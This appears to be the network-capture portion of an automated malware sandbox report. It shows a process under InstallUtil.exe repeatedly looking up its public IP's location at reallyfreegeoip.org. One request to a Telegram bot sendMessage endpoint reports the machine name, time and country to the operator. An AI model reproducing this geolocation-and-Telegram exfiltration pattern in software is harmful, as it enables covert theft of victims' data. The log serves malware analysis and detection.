                                                2024-10-08 10:45:17 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.549744188.114.97.34435480C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:19 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:19 UTC678INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:19 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50651
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YM%2BE1P7CgAXDgMbzfl9H48v4eecRU8PbGaRvprYblxiUFt%2B72MYD2KB%2FrkYFHizfAOSy47YrfW0GqMsCp6vmmjcPddO0ma14ALEFMLphlEJ%2FwSqaXbmgbAlyL1LWjef36Cw4wrMi"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a6c290bc47f-EWR
                                                2024-10-08 10:45:19 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.2.549745188.114.97.34433228C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:19 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:19 UTC674INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:19 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50651
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cfMQUXMo8EayTikeaWXLto3eQlcgvVdpz8ZudVUtQ8URv36SinmN%2BKYS4uVGCPwwsZU4b6XCjs46bKiijBdZcvgJvWwoSKs60dhJDCA2v4JOtExqnOFNH2JQPac8LLS%2FEjIeoPhq"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a6c1fe44361-EWR
                                                2024-10-08 10:45:19 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                11192.168.2.549755188.114.97.34435480C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:21 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-10-08 10:45:22 UTC678INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:21 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50653
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ARzHfxFIRQn09o6SrL%2B3rpLY2RANe9SUWjXzAtdB47ZgPCCiF8q4bSriWTOqNnI77%2BYy11aRMEJzsl%2BqGgBATMI4f5wOCfLjUbdNt%2B2r3KWZjhYjMyz2j8mD0jlEdb9cDkGNWkjw"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a77e957436a-EWR
                                                2024-10-08 10:45:22 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                12192.168.2.549754188.114.97.34433228C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:21 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-10-08 10:45:22 UTC680INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:21 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50653
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=su8oKugQzDbdENL%2B29eshkCIb%2BaJKxQc39RzD1%2BYNPbpMdps5MELkLu2GJgby4VI93NUyKX3NCWHET08m%2BFdabwXw8LAHlAqdmJ8UBBE6EHv0ZOY326ZKfWOw4Z71nISTsQRK%2FWN"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a77e9067298-EWR
                                                2024-10-08 10:45:22 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                13192.168.2.549756188.114.97.34433772C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:22 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:22 UTC678INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:22 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50654
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jKE9fwG6lCOnlpsGHoiF0dXdHTR9%2BytOYvbtHiy%2BiuU0bWid%2FSYy%2BsGrBtztfhuAdEYQgYkarNqWTpX4QZEYIyyCPa5R4M5i7C9tLzgxnCiXbajPaBa4PB6lTtArGSIDPbIql9FU"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a7f9d6f8c0f-EWR
                                                2024-10-08 10:45:22 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                14192.168.2.549769188.114.97.34433772C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:23 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-10-08 10:45:23 UTC706INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:23 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50655
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YbJnELKb97VaqvR9JWAcHQgD0pBe4t46DZy6RkPFJmr3Ohcg%2FW585AQbjEOH2H60VPii1p7rgcHG71Vzmj%2Bxyrp20H%2BuQ7jV8s9uue6ADZ82HLzKh4RoWPs5HOtjPFRbgR2aW4oF"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a854a980f78-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-10-08 10:45:23 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                15192.168.2.549770188.114.97.34433228C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:23 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-10-08 10:45:23 UTC676INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:23 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50655
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0IqAYAQUCNGleTEcpQVSrc8eOZWk7zw6JRlFY1Q9%2BSOZ3g91cbDuqS3ZSqz2BrFpwFyiJiZIgNXqQaIDRAUKz5EUWRIbTZxFF8%2FfrOeZa0XCGxqeSD5r%2BTMLObqUtR1z7Rpna1GS"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a85f921425e-EWR
                                                2024-10-08 10:45:23 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                16192.168.2.549771188.114.97.34435480C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:23 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-10-08 10:45:23 UTC680INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:23 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50655
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8zhZ5CgveUYJ6c7kgGCbxtF3k%2F2BzM2lUMkl%2BJFYv4w00K5ac7FYWeK%2FnfoLae8V1KAPh%2BhOd9mSV7B99bKDNdpgphrshfBDRBHkDKd0BjQEzlruQtfLQaX%2FKf2vo8TfzW2wzwSq"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a8658680f89-EWR
                                                2024-10-08 10:45:23 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                17192.168.2.549778149.154.167.2204433228C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:24 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2009/10/2024%20/%2013:20:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                Host: api.telegram.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:24 UTC344INHTTP/1.1 404 Not Found
                                                Server: nginx/1.18.0
                                                Date: Tue, 08 Oct 2024 10:45:24 GMT
                                                Content-Type: application/json
                                                Content-Length: 55
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                2024-10-08 10:45:24 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                18192.168.2.549780188.114.97.34433772C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:24 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:25 UTC712INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:24 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50656
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ePRtWnTH8Z7tmPolbHv02fYNINqBxFkUxQ2CWorqnFWzqKMHtjdeuFC57FL7S1PL9lrC%2F40SGVlG4JigioHOhYLk%2BT%2Bk0o8cCQKPjQ8%2FaKX9SqcwxTre%2Fd8uRqAIodU0%2BzRDBUHk"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a8cac7242e4-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-10-08 10:45:25 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
